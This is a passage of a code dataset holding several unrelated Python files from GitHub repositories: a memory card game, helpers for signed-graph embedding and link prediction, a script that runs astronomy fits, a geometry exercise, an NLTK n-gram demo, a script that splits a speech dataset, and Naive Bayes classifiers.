index=False)","repo_name":"ArmaanAhmed22/CompareCoCversusNonCoC","sub_path":"Pipeline/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24501290196","text":"# implementation of card game - Memory\n\nimport simplegui\nimport random\n\n# helper function to initialize globals\ndef new_game():\n global deck, exposed, nTurns, state, cInd1, cInd2\n deck = [x for x in range(8)] * 2\n random.shuffle(deck)\n exposed = [False] * 16\n nTurns = 0\n state = 0\n cInd1, cInd2 = -1, -1\n \n\n \n# define event handlers\ndef mouseclick(pos):\n # add game state logic here\n global nTurns, state, cInd1, cInd2\n cardInd = list(pos)[0] // 50\n if not exposed[cardInd]:\n if state == 0:\n cInd1 = cardInd\n exposed[cInd1] = True\n state = 1\n elif state == 1:\n cInd2 = cardInd\n exposed[cInd2] = True\n state = 2\n nTurns += 1\n label.set_text(\"Turns = \" + str(nTurns))\n else:\n if deck[cInd1] != deck[cInd2]:\n exposed[cInd1], exposed[cInd2] = False, False\n cInd1, cInd2 = -1, -1\n cInd1 = cardInd\n exposed[cInd1] = True\n state = 1\n\n \n \n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n for i in range(16):\n if exposed[i]:\n canvas.draw_polygon([[i*50, 0], [(i+1)*50, 0], [(i+1)*50, 100], [i*50, 100]], 1, \"Black\", \"White\")\n canvas.draw_text(str(deck[i]), (i*50+15, 65), 50, \"Black\")\n else:\n canvas.draw_polygon([[i*50, 0], [(i+1)*50, 0], [(i+1)*50, 100], [i*50, 100]], 1, \"Black\", \"Teal\")\n label.set_text(\"Turns = \" + str(nTurns))\n \n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", 800, 100)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n\n\n# Always remember to review the grading rubric","repo_name":"linzifan/python_courses","sub_path":"IPP-Project-5-Memory.py","file_name":"IPP-Project-5-Memory.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"21214414235","text":"# -*- coding:utf-8 -*-\n# from numpy.random import shuffle as np_shuffle\n# from enum import _EnumDict\n\nimport numpy as np\nimport re\nfrom collections import defaultdict\nimport random\nimport datetime\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score, f1_score, accuracy_score\nimport copy\n\n\nclass SignedGraph(object):\n def __init__(self, fpath, is_undiredted=True):\n self.G_pos = None\n self.G_neg = None\n self.edge_pos = None\n self.edge_neg = None\n\n self.node_all = set()\n self.read_signed_graph(fpath, is_undiredted)\n\n def read_signed_graph(self, fpath, is_undirected=False):\n '''\n\n :param fpath:\n :param is_undirected: add bidirectional edge\n :return: G_pos, G_neg\n '''\n G_pos = defaultdict(set)\n G_neg = defaultdict(set)\n edge_pos = []\n edge_neg = []\n node_all = set()\n\n with open(fpath) as f:\n for line in f:\n if len(line) > 0 and line[0] == '#':\n continue\n else:\n res = re.split(r'\\s+', line.strip())\n source_node, target_node, sign = map(int, res)\n\n node_all.add(source_node)\n node_all.add(target_node)\n\n if sign == 1:\n if target_node not in G_pos[source_node]:#remove repeated edge\n G_pos[source_node].add(target_node)\n edge_pos.append((source_node, target_node, sign))\n if is_undirected:\n if source_node not in G_pos[target_node]:\n G_pos[target_node].add(source_node)\n edge_pos.append((target_node, source_node, sign))\n\n elif sign == -1:\n if target_node not in G_neg[source_node]:\n G_neg[source_node].add(target_node)\n edge_neg.append((source_node, target_node, sign))\n if is_undirected:\n if source_node not in G_neg[target_node]:\n G_neg[target_node].add(source_node)\n edge_neg.append((target_node, source_node, sign))\n else:\n print('unknown sign:', sign)\n exit(-1)\n\n self.G_pos = G_pos\n self.G_neg = G_neg\n self.edge_pos = edge_pos\n self.edge_neg = edge_neg\n self.node_all = node_all\n\n return G_pos, G_neg\n\n\n\ndef signet_read_edge_info(fpath):\n edge_list = []\n with open(fpath) as f:\n for line in f:\n if line[0] != '#':\n s, t, sign = map(int, re.split(r'\\s+', line.strip()))\n edge_list.append([s, t, sign])\n\n return edge_list\n\ndef signet_save_edge_info(edge_list, fpath):\n with open(fpath, 'w') as f:\n for edge in edge_list:\n s = ' '.join(map(str, edge)) + '\\n'\n f.write(s)\n\ndef BESIDE_trans_emb_to_xy(aux_parameter, edge_tuples, mode_choose):\n '''\n from emb and parameters to feature\n return [x,y]\n '''\n X = []\n Y = []\n epoch_emb, wi, wj, bedge, sta_w1_source, sta_w1_target, sta_b1_source, sta_b1_target, sta_w_for_score, sta_b_for_score,sta_w_for_score_combined, sta_b_for_score_combined = aux_parameter\n\n for edge in edge_tuples:\n # e.g. [1,3,-1]\n y = edge[2] if edge[2] == 1 else 0 # 1->1,-1->0\n emb_1 = np.array(epoch_emb[edge[0]])\n emb_2 = np.array(epoch_emb[edge[1]])\n\n triad_emb_edge = np.matmul(emb_1, wi) + np.matmul(emb_2, wj) + bedge\n\n\n sta_source_fea_emb = np.matmul(emb_1, sta_w1_source) + sta_b1_source\n sta_target_fea_emb = np.matmul(emb_2, sta_w1_target) + sta_b1_target\n status_fea_vec = sta_source_fea_emb - sta_target_fea_emb\n\n if mode_choose == 'tri_sta':\n final_fea = np.zeros(shape=len(triad_emb_edge) + len(status_fea_vec))\n final_fea[:len(triad_emb_edge)] = triad_emb_edge\n final_fea[len(triad_emb_edge):len(triad_emb_edge) + len(status_fea_vec)] = status_fea_vec\n\n elif mode_choose == 'tri':\n final_fea = triad_emb_edge\n\n else:\n print('unknown mode_choose:{}', mode_choose)\n exit()\n\n X.append(final_fea)\n Y.append(y)\n return np.array(X), np.array(Y)\n\n\n \ndef BESIDE_check_link_prediction_task(dataset_train_fpath, dataset_test_fpath, sub_log_fpath, epoch_no, aux_parameter,\n mode_choose, extra_info=None):\n '''\n different mode_choose -> report performance of different tasks\n\n '''\n\n\n edge_method = '(xiWi+xjWj+b)' # 'l2_weight'#'l1_weight'# 'hadamard' #\n\n\n edge_train = signet_read_edge_info(dataset_train_fpath)\n edge_test = signet_read_edge_info(dataset_test_fpath)\n\n\n if mode_choose == 'sta': # compare directly\n epoch_emb, Wi, Wj, bedge, sta_w1_source, sta_w1_target, sta_b1_source, sta_b1_target, sta_w_for_score, sta_b_for_score,sta_w_for_score_combined, sta_b_for_score_combined = aux_parameter\n\n def get_source_score(node):\n tmp_emb = epoch_emb[node]\n return np.matmul(np.matmul(tmp_emb,sta_w1_source) + sta_b1_source,sta_w_for_score) + sta_b_for_score\n def get_target_score(node):\n tmp_emb = epoch_emb[node]\n return np.matmul(np.matmul(tmp_emb,sta_w1_target) + sta_b1_target,sta_w_for_score) + sta_b_for_score\n correct_num = 0\n total_num = len(edge_test)\n equal_num = 0\n for edge in edge_test:\n u, v, sign = edge\n sta_source_score_u = get_source_score(u)[0]\n sta_target_score_v = get_target_score(v)[0]\n if (sta_source_score_u < sta_target_score_v and sign == 1) or (sta_source_score_u > sta_target_score_v and sign == -1):\n correct_num += 1\n if sta_source_score_u == sta_target_score_v:\n equal_num += 1\n\n sta_cmp_acc = 1.0 * correct_num / total_num\n print(sub_log_fpath + '\\n{}:test epoch {}: acc {:.4f}({}/{}|equ={}) ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, sta_cmp_acc,correct_num,total_num,equal_num ,edge_method))\n\n if extra_info:\n print('extra_info:', extra_info)\n print('writing result to', sub_log_fpath)\n\n with open(sub_log_fpath, 'a') as f:\n s = sub_log_fpath + '\\n{}:test epoch {}: acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, sta_cmp_acc, edge_method)\n\n if extra_info:\n s += '{}\\n'.format(extra_info)\n\n f.write(s)\n else: #tri and tri_sta\n\n edge_train_emb_X, edge_train_emb_Y = BESIDE_trans_emb_to_xy(aux_parameter, edge_train, mode_choose)\n edge_test_emb_X, edge_test_emb_Y = BESIDE_trans_emb_to_xy(aux_parameter, edge_test, mode_choose)\n\n\n #train LR and test\n lr = LogisticRegression()\n lr.fit(edge_train_emb_X, edge_train_emb_Y)\n\n test_y_score = lr.predict_proba(edge_test_emb_X)[:, 1]\n\n test_y_pred = lr.predict(edge_test_emb_X)\n\n lp_auc_score = roc_auc_score(edge_test_emb_Y, test_y_score, average='macro')\n\n lp_f1_score_macro = f1_score(edge_test_emb_Y, test_y_pred, average='macro')\n lp_f1_score_micro = f1_score(edge_test_emb_Y, test_y_pred, average='micro')\n lp_acc = accuracy_score(edge_test_emb_Y, test_y_pred)\n\n\n print('{}:test epoch {}: auc {:.4f} f1_macro {:.4f} f1_micro {:.4f} acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, lp_auc_score, lp_f1_score_macro, lp_f1_score_micro, lp_acc,\n edge_method))\n\n\n if extra_info:\n print('extra_info:', extra_info)\n print('writing result to', sub_log_fpath)\n\n with open(sub_log_fpath, 'a') as f:\n s = sub_log_fpath + '\\n{}:test epoch {}: auc {:.4f} f1_macro {:.4f} f1_micro {:.4f} acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, lp_auc_score, lp_f1_score_macro, lp_f1_score_micro,\n lp_acc, edge_method)\n\n if extra_info:\n s += '{}\\n'.format(extra_info)\n\n f.write(s)\n\n\ndef BESIDE_sta_gen_batch(batch_size, edge_train, node_train_set, G_pos_train_ori, G_neg_train_ori):\n '''\n sample for bridge edges\n\n :return: (i,j,true_sign_ij)\n '''\n\n G_pos_train = copy.deepcopy(G_pos_train_ori)\n G_neg_train = copy.deepcopy(G_neg_train_ori)\n\n node_train_list = list(node_train_set)\n np.random.shuffle(node_train_list)\n\n edge_train_list = list(edge_train)\n np.random.shuffle(edge_train_list)\n\n for node, neis in G_pos_train_ori.items():\n if node in neis:\n G_pos_train[node].remove(node)\n\n for node, neis in G_neg_train_ori.items():\n if node in neis:\n G_neg_train[node].remove(node)\n\n\n\n bridge_edge_num = 0\n\n G_pos_train_rev = defaultdict(set)\n G_neg_train_rev = defaultdict(set)\n for cur_node, neis in G_pos_train.items():\n for nei in neis:\n G_pos_train_rev[nei].add(cur_node)\n for cur_node, neis in G_neg_train.items():\n for nei in neis:\n G_neg_train_rev[nei].add(cur_node)\n\n def remove_self_loop(G_dict):\n G_dict_copy = copy.deepcopy(G_dict)\n for node,neis in G_dict_copy.items():\n if node in neis:\n G_dict[node].remove(node)\n return G_dict\n\n G_pos_train = remove_self_loop(G_pos_train)\n G_neg_train = remove_self_loop(G_neg_train)\n G_pos_train_rev = remove_self_loop(G_pos_train_rev)\n G_neg_train_rev = remove_self_loop(G_neg_train_rev)\n\n\n cur_batch = []\n for edge_idx, edge in enumerate(edge_train_list):\n\n i, j, sign = edge\n\n true_sign = 1 if sign == 1 else 0\n\n if i == j:\n continue\n\n bak_nodes_i = G_pos_train[i].union(G_neg_train[i]).union(G_pos_train_rev[i]).union(G_neg_train_rev[i])\n bak_nodes_j = G_pos_train[j].union(G_neg_train[j]).union(G_pos_train_rev[j]).union(G_neg_train_rev[j])\n bak_k_nodes = bak_nodes_i.intersection(bak_nodes_j)\n\n if not bak_k_nodes: # `bridge' edge\n bridge_edge_num += 1\n\n cur_batch.append([i, j, true_sign])\n if len(cur_batch) == batch_size:\n yield np.array(cur_batch)\n cur_batch = []\n\n if len(cur_batch) > 0:\n yield np.array(cur_batch)\n\n # print('status:bridge_edge_num:{}'.format(bridge_edge_num))\n\n\n\n\ndef BESIDE_tri_gen_batch(batch_size, edge_train, node_train_set, G_pos_train_ori, G_neg_train_ori,\n max_one_edge_train_samples=16):\n '''\n sample for common edges (with triads)\n\n :return: (i,j,i,k,j,k,sign_ij,sign_ik,sign_jk)\n '''\n\n G_pos_train = copy.deepcopy(G_pos_train_ori)\n G_neg_train = copy.deepcopy(G_neg_train_ori)\n\n node_train_list = list(node_train_set)\n np.random.shuffle(node_train_list)\n\n edge_train_list = list(edge_train)\n np.random.shuffle(edge_train_list)\n\n\n\n for node, neis in G_pos_train_ori.items():\n if node in neis:\n G_pos_train[node].remove(node)\n\n for node, neis in G_neg_train_ori.items():\n if node in neis:\n G_neg_train[node].remove(node)\n\n G_pos_train_rev = defaultdict(set)\n G_neg_train_rev = defaultdict(set)\n for cur_node, neis in G_pos_train.items():\n for nei in neis:\n G_pos_train_rev[nei].add(cur_node)\n for cur_node, neis in G_neg_train.items():\n for nei in neis:\n G_neg_train_rev[nei].add(cur_node)\n\n def remove_self_loop(G_dict):\n G_dict_copy = copy.deepcopy(G_dict)\n for node,neis in G_dict_copy.items():\n if node in neis:\n G_dict[node].remove(node)\n return G_dict\n\n G_pos_train = remove_self_loop(G_pos_train)\n G_neg_train = remove_self_loop(G_neg_train)\n G_pos_train_rev = remove_self_loop(G_pos_train_rev)\n G_neg_train_rev = remove_self_loop(G_neg_train_rev)\n\n return_batch = []\n\n sampled_node_set = set()\n actual_train_node_set = set()\n\n\n for edge_idx, edge in enumerate(edge_train_list):\n actual_train_node_set.add(edge[0])\n actual_train_node_set.add(edge[1])\n\n cur_batch = []\n\n i, j, sign_ij = edge\n\n if sign_ij == -1:\n sign_ij = 0\n else:\n sign_ij = 1\n\n\n if i == j:\n continue\n\n bak_nodes_i = G_pos_train[i].union(G_neg_train[i]).union(G_pos_train_rev[i]).union(G_neg_train_rev[i])\n bak_nodes_j = G_pos_train[j].union(G_neg_train[j]).union(G_pos_train_rev[j]).union(G_neg_train_rev[j])\n bak_k_nodes = bak_nodes_i.intersection(bak_nodes_j)\n if not bak_k_nodes: # edges which do not have triads\n continue\n\n if len(bak_k_nodes) > max_one_edge_train_samples: # in case there are too many triads\n bak_k_nodes = random.sample(list(bak_k_nodes), max_one_edge_train_samples)\n else:\n bak_k_nodes = list(bak_k_nodes)\n\n for k in bak_k_nodes:\n tmp_ik = (i, k)\n tmp_jk = (j, k)\n sign_ik = 1\n sign_jk = 1\n if k in G_pos_train[i]:\n pass\n elif k in G_neg_train[i]:\n sign_ik = 0\n elif k in G_pos_train_rev[i]:\n tmp_ik = (k, i)\n elif k in G_neg_train_rev[i]:\n tmp_ik = (k, i)\n sign_jk = 0\n\n if k in G_pos_train[j]:\n pass\n elif k in G_neg_train[j]:\n sign_jk = 0\n elif k in G_pos_train_rev[j]:\n tmp_jk = (k, j)\n elif k in G_neg_train_rev[j]:\n tmp_jk = (k, j)\n sign_jk = 0\n cur_batch.append([i, j, tmp_ik[0], tmp_ik[1], tmp_jk[0], tmp_jk[1], sign_ij, sign_ik, sign_jk])\n\n for one_strip in cur_batch:\n sampled_node_set.add(one_strip[0])\n sampled_node_set.add(one_strip[1])\n if len(return_batch) == batch_size:\n yield np.array(return_batch)\n return_batch = []\n return_batch.append(one_strip)\n\n if len(return_batch) > 0:\n yield np.array(return_batch)\n\n\n\ndef signet_read_node_info(dataset_nodes_fpath):\n node_set = set(np.loadtxt(dataset_nodes_fpath, dtype=np.int32))\n return node_set\n\ndef signet_read_train_edge(dataset_train_fpath, dataset_nodes_fpath):\n edge_train = signet_read_edge_info(dataset_train_fpath)\n node_all_set = signet_read_node_info(dataset_nodes_fpath)\n\n G_pos_train = defaultdict(set)\n G_neg_train = defaultdict(set)\n node_train_set = set()\n\n for edge in edge_train:\n source_node, target_node, sign = edge\n if sign == 1:\n G_pos_train[source_node].add(target_node)\n elif sign == -1:\n G_neg_train[source_node].add(target_node)\n else:\n print('unknown sign:', sign)\n exit(-1)\n node_train_set.add(source_node)\n\n\n node_num = max(node_all_set) + 1 # in case the embedding lookup index out of range\n\n return node_train_set, G_pos_train, G_neg_train, node_num\n\n\ndef stacmp_read_train_edge(dataset_train_fpath, dataset_nodes_fpath):\n edge_train = signet_read_edge_info(dataset_train_fpath)\n node_all_set = signet_read_node_info(dataset_nodes_fpath)\n \n G_pos_train = defaultdict(set)\n G_neg_train = defaultdict(set)\n node_train_set = set()\n\n for edge in edge_train:\n source_node, target_node, sign = edge\n if sign == 1:\n G_pos_train[source_node].add(target_node)\n elif sign == -1:\n G_neg_train[source_node].add(target_node)\n else:\n print('unknown sign:', sign)\n exit(-1)\n node_train_set.add(source_node)\n\n node_num = max(node_all_set) + 1\n\n return node_train_set, G_pos_train, G_neg_train, node_num\n","repo_name":"yqc01/BESIDE","sub_path":"data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":16058,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"33778532673","text":"\nimport os\nimport glob\nimport subprocess\nimport time\n\nfrom astropy.table import Table\n\nbegin = time.time()\n\nclusters = ['m416'] # ['a370', 'a1063', 'a2744', 'm416', 'm717', 'm1149']\nfor cluster in clusters :\n outDir = '{}/h5'.format(cluster)\n filterFile = '{}/{}_filters.txt'.format(cluster, cluster)\n photometries = '{}/photometry/{}_ID_2876_photometry.fits'.format(cluster,\n cluster)\n \n os.makedirs(outDir, exist_ok=True) # ensure the output directory for the\n # results is available\n \n # get a list of fits files containing photometric data for all bins for\n # a given galaxy, as denoted by ID\n phot_files = glob.glob(photometries)\n \n # loop over all the fits files in the directory\n for file in phot_files :\n ID = file.split('_')[2] # the galaxy ID to fit the bins for\n table = Table.read(file)\n bins = table['bin'] # get a list of bin values\n \n # create the output directory for the given galaxy\n outGal = '{}/{}'.format(outDir, ID)\n os.makedirs(outGal, exist_ok=True)\n \n for binNum in [10] : #bins : # loop over all the bins in the table\n \n # parameters necessary for fitting and writing output\n redshift = table['z'][binNum]\n # lumDist = table['lumDist'][binNum]\n outfile = '{}/{}_ID_{}_BIN_{}_npTT1'.format(outGal, cluster, ID, binNum)\n \n # create argument list to pass to params.py\n args = ['python', 'params.py', #'mpiexec', '-np', '10', this goes before 'python'\n '--object_redshift', str(redshift),\n # '--luminosity_distance', str(lumDist),\n '--fixed_metallicity', str(0.02),\n '--infile', str(file),\n '--filterFile', str(filterFile),\n '--binNum', str(int(binNum)),\n '--verbose', str(int(1)), # True\n '--emcee',\n # '--dynesty',\n # '--nested_dlogz_init=500', # see prospect/utils/prospect_args.py\n # '--nested_posterior_thresh=50', # for more information\n '--outfile', outfile]\n try :\n subprocess.run(args) # run the subprocess\n except :\n pass\n\nend = time.time()\n\nprint(end - begin)\n","repo_name":"camlawlorforsyth/HFF","sub_path":"boneyard/prospector.py","file_name":"prospector.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73109392439","text":"from math import pi, floor\r\nprint('________________VOLUME DO CUBO E DA ESFERA___________________')\r\n\r\n#Valores\r\nr = float(input('Digite o raio da esfera: '))\r\na = float(input('Digite o valor da aresta: '))\r\n\r\n#Volume Esfera\r\nraio_esfera_cubo = r ** 3\r\n\r\nvolume_esfera = floor(4/3 * pi * raio_esfera_cubo)\r\nvolume_cubo = a ** 3\r\n\r\n#Volume Livre\r\nvolume_livre = volume_esfera + volume_cubo\r\n\r\nprint('O Volume livre desse ambiente é de: {:.2f}'.format(volume_livre))","repo_name":"JoaoVitorJJV/UFRA-Exercicios-BPM-LB","sub_path":"Aritmética Simples/volume_cubo_esfera.py","file_name":"volume_cubo_esfera.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31361828535","text":"import nltk\r\nfrom nltk.tokenize import word_tokenize\r\ntext = \"\"\"Parsing is the method to identify and understand the syntactic structure of a text.\r\nIt is done by analyzing the individual elements of the text. \"\"\"\r\ntext_tokenized = word_tokenize(text)\r\nprint(list(nltk.bigrams(text_tokenized)))\r\n# Output: [('Parsing', 'is'), ('is\", 'the'), ('the', 'method'), ('method', 'to')......]\r\n\r\nprint(list(nltk.trigrams(text_tokenized)))\r\n# Output: [('Parsing', 'is', 'the'), ('is', 'the', 'method'), ('the', 'method', 'to')......]\r\n\r\n# For extracting n-grams, we can use the function nltk.ngrams and give the argument n for the number of parsers.\r\nprint(list(nltk.ngrams(text_tokenized,5)))\r\n","repo_name":"Viola8/Python-NLP-Libraries","sub_path":"nltk_bigrams_n_grams.py","file_name":"nltk_bigrams_n_grams.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21186594191","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDescription:\n Creation of the speech data by splitting the recordings\n into train, validation and test sets.\n Filtering out recordings that are too long.\n\nUsage:\n $ python src/data/create_speech_data.py -s\n\nPossible arguments:\n * -s or --save: Save dataframe to csv\n\"\"\"\nimport os\nimport shutil\n\nimport click\nimport librosa\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nfrom src.decorators import log_function_name\nfrom src.stt.constants import (\n MAX_DURATION_LENGTH,\n RAW_DATA_DIR,\n RAW_RECORDINGS_DIR,\n RECORDINGS_FILE,\n)\n\n\ndef get_wav_file_duration(file_path: str) -> float:\n \"\"\"\n Get the duration of a wav file\n\n Parameters\n ----------\n file_path : str\n Path to the wav file\n\n Returns\n -------\n float\n Duration of the wav file in seconds\n \"\"\"\n return librosa.get_duration(filename=os.path.join(RAW_RECORDINGS_DIR, file_path))\n\n\n@log_function_name\ndef copy_files(files_list: list[str], folder: str) -> None:\n \"\"\"\n Copy files from the raw data folder to the new folder\n\n Parameters\n ----------\n files_list : list[str]\n List of files to copy\n folder : str\n Name of the folder to copy the files to\n \"\"\"\n new_dir = os.path.join(RAW_DATA_DIR, folder)\n if os.path.exists(new_dir) and os.path.isdir(new_dir):\n shutil.rmtree(new_dir)\n os.makedirs(new_dir, exist_ok=True)\n\n for file in files_list:\n shutil.copyfile(\n os.path.join(RAW_RECORDINGS_DIR, file),\n os.path.join(new_dir, file),\n )\n\n\n@log_function_name\ndef clean_df(df: pd.DataFrame, folder: str) -> pd.DataFrame:\n \"\"\"\n Clean the dataframe by adjusting, adding and removing the required columns.\n Adding the files to the new respective folder.\n\n Parameters\n ----------\n df : pd.DataFrame\n Dataframe to clean\n folder : str\n Name of the folder to copy the files to\n\n Returns\n -------\n pd.DataFrame\n Cleaned dataframe\n \"\"\"\n\n df[\"path\"] = df[\"file_name\"].apply(lambda x: os.path.join(RAW_DATA_DIR, folder, x))\n df[\"audio\"] = df[\"path\"]\n df = df.rename(columns={\"phrase\": \"sentence\"})\n\n copy_files(df[\"file_name\"].tolist(), folder)\n\n df = df.loc[:, [\"audio\", \"sentence\", \"path\"]]\n\n return df\n\n\n@log_function_name\ndef create_own_dataset(\n file_path: str,\n) -> tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Adjusting the dataset to the required format\n\n Parameters\n ----------\n file_path : str,\n Path to the csv file\n\n Returns\n -------\n tuple(pd.DataFrame, pd.DataFrame, pd.DataFrame)\n Tuple of train, validation and test dataframes\n \"\"\"\n\n df = pd.read_csv(file_path)\n\n df[\"duration\"] = df[\"file_name\"].apply(get_wav_file_duration)\n df = df[df[\"duration\"] < MAX_DURATION_LENGTH].copy()\n\n df_train, df_test = train_test_split(df, test_size=0.25, random_state=42)\n df_train, df_val = train_test_split(df_train, test_size=0.3, random_state=42)\n\n df_train = clean_df(df_train, \"train\")\n df_val = clean_df(df_val, \"val\")\n df_test = clean_df(df_test, \"test\")\n\n return df_train, df_val, df_test\n\n\n@click.command()\n@click.option(\n \"--save\",\n \"-s\",\n help=\"Save dataframe\",\n default=False,\n is_flag=True,\n required=False,\n)\n@log_function_name\ndef main(save: bool) -> None:\n \"\"\"\n Main function\n\n Parameters\n ----------\n save : bool\n Flag if data should be saved\n \"\"\"\n if not save:\n print(\"No data will be saved\")\n\n df_train, df_val, df_test = create_own_dataset(RECORDINGS_FILE)\n\n if save:\n df_train.to_csv(os.path.join(RAW_DATA_DIR, \"train.csv\"), index=False)\n df_val.to_csv(os.path.join(RAW_DATA_DIR, \"val.csv\"), index=False)\n df_test.to_csv(os.path.join(RAW_DATA_DIR, \"test.csv\"), index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tara-Sophia/NLP_Masterthesis","sub_path":"src/stt/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"19286504617","text":"import numpy as np\r\nimport math\r\nfrom scipy.stats import norm\r\nfrom sklearn.base import BaseEstimator\r\n\r\n#NOTES:\r\n#Zrobic dict'y i zliczac wystapienia\r\n#Liczniki normaliziuja\r\n\r\n\r\n\r\nclass NaiveBayesNominal:\r\n\r\n\r\n def __init__(self):\r\n self.classProbabilities = dict() # { Y : P(Y) }\r\n self.featureConditionalProbabilities = dict() # { (Xindex, X, Y) : P(X|Y) }\r\n self.classes = []\r\n # self.classes_ = None\r\n # self.model = dict()\r\n # self.y_prior = []\r\n\r\n\r\n # X = 'dreszcze', 'katar', 'bol_glowy', 'goraczka'\r\n # y = 'grypa'\r\n\r\n def fit(self, X, y):\r\n self.classes = np.unique(y)\r\n numOfClasses = np.size(y)\r\n classQuantities = dict()\r\n for class_ in np.nditer(self.classes):\r\n classQuantities[class_.item(0)] = np.count_nonzero(y == class_) #wykorzystac w linijce ponizej\r\n self.classProbabilities[class_.item(0)] = np.count_nonzero(y == class_) / float(numOfClasses)\r\n\r\n for xIndex in range(0, len(X[0,:])):\r\n classesWithFeature = dict() # { (X,Y) : occurances }\r\n for yIndex in range(0, numOfClasses):\r\n classWithFeature = ( X[yIndex, xIndex], y[yIndex] )\r\n if classWithFeature not in classesWithFeature:\r\n classesWithFeature[classWithFeature] = 1\r\n else:\r\n classesWithFeature[classWithFeature] += 1\r\n\r\n for tup in classesWithFeature:\r\n self.featureConditionalProbabilities[(xIndex,) + tup] = classesWithFeature[tup] / float(classQuantities[tup[1]])\r\n\r\n def predict_proba(self, X):\r\n result = []\r\n for x in X:\r\n classScore = dict()\r\n for y in self.classes:\r\n classScore[y] = self.classProbabilities[y]\r\n for index, xi in np.ndenumerate(x):\r\n classScore[y] *= self.featureConditionalProbabilities[(index[0], xi, y)]\r\n denominator = sum(classScore.values())\r\n result.append(max(classScore.values())/denominator)\r\n return np.array(result)\r\n\r\n\r\n def predict(self, X):\r\n result = []\r\n for x in X:\r\n classScore = dict()\r\n for y in self.classes:\r\n classScore[y] = self.classProbabilities[y]\r\n for index, xi in np.ndenumerate(x):\r\n classScore[y] *= self.featureConditionalProbabilities[(index[0], xi, y)]\r\n result.append(max(classScore, key=classScore.get))\r\n return np.array(result)\r\n\r\nclass NaiveBayesGaussian:\r\n def __init__(self):\r\n self.classes = []\r\n self.classProbabilities = dict() # { Y : P(Y) }\r\n self.featureProbs = dict() # { { (Xindex, X, Y) : G(X) } }\r\n self.featureAvgs = dict() # { (Xindex, Y) : val }\r\n self.featureDeviations = dict()\r\n\r\n def fit(self, X, y):\r\n self.classes = np.unique(y)\r\n numOfClasses = np.size(y)\r\n classQuantities = dict()\r\n for class_ in np.nditer(self.classes):\r\n classQuantities[class_.item(0)] = np.count_nonzero(y == class_) # wykorzystac w linijce ponizej\r\n self.classProbabilities[class_.item(0)] = np.count_nonzero(y == class_) / float(numOfClasses)\r\n\r\n featuresWithClass = dict() # { (Xindex, Y) : occurances }\r\n\r\n for yIndex, y in np.ndenumerate(y):\r\n for xIndex in range(0, len(X[0,:])):\r\n if (xIndex, y) in featuresWithClass:\r\n featuresWithClass[(xIndex, y)] = np.append(featuresWithClass[(xIndex, y)], X[yIndex, xIndex])\r\n else:\r\n featuresWithClass[(xIndex, y)] = np.array(X[yIndex, xIndex])\r\n\r\n for key, value in featuresWithClass.iteritems():\r\n self.featureAvgs[key] = np.mean(value)\r\n self.featureDeviations[key] = np.std(value)\r\n\r\n\r\n def predict_proba(self, X):\r\n result = []\r\n for x in X:\r\n classScore = dict()\r\n for y in np.unique(self.classes):\r\n classScore[y] = self.classProbabilities[y]\r\n for index, xi in np.ndenumerate(x):\r\n # print(self.featureDeviations[(index[0], y)])\r\n classScore[y] *= 1 / (self.featureDeviations[(index[0], y)] * math.sqrt(2 * math.pi)) * math.exp(\r\n ((-1) * math.pow(xi - self.featureAvgs[(index[0], y)], 2)) / (\r\n 2 * pow(self.featureDeviations[(index[0], y)], 2)))\r\n denominator = sum(classScore.values())\r\n res = np.array([])\r\n for score in classScore.values():\r\n res = np.append(res, [score/denominator])\r\n result.append(res)\r\n\r\n return np.array(result)\r\n\r\n def predict(self, X):\r\n result = []\r\n for x in X:\r\n classScore = dict()\r\n for y in np.unique(self.classes):\r\n classScore[y] = self.classProbabilities[y]\r\n for index, xi in np.ndenumerate(x):\r\n # print(self.featureDeviations[(index[0], y)])\r\n classScore[y] *= 1/(self.featureDeviations[(index[0], y)]*math.sqrt(2*math.pi))*math.exp(((-1)*math.pow(xi - self.featureAvgs[(index[0], y)],2))/(2*pow(self.featureDeviations[(index[0], y)],2)))\r\n result.append(max(classScore, key=classScore.get))\r\n return np.array(result)\r\n\r\n\r\nclass NaiveBayesNumNom(BaseEstimator):\r\n def __init__(self, is_cat=None, m=0.0):\r\n raise NotImplementedError\r\n\r\n def fit(self, X, yy):\r\n raise NotImplementedError\r\n\r\n def predict_proba(self, X):\r\n raise NotImplementedError\r\n\r\n def predict(self, X):\r\n raise NotImplementedError","repo_name":"KrzysztofR-PUT/sklearn-1","sub_path":"classifiers_students/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 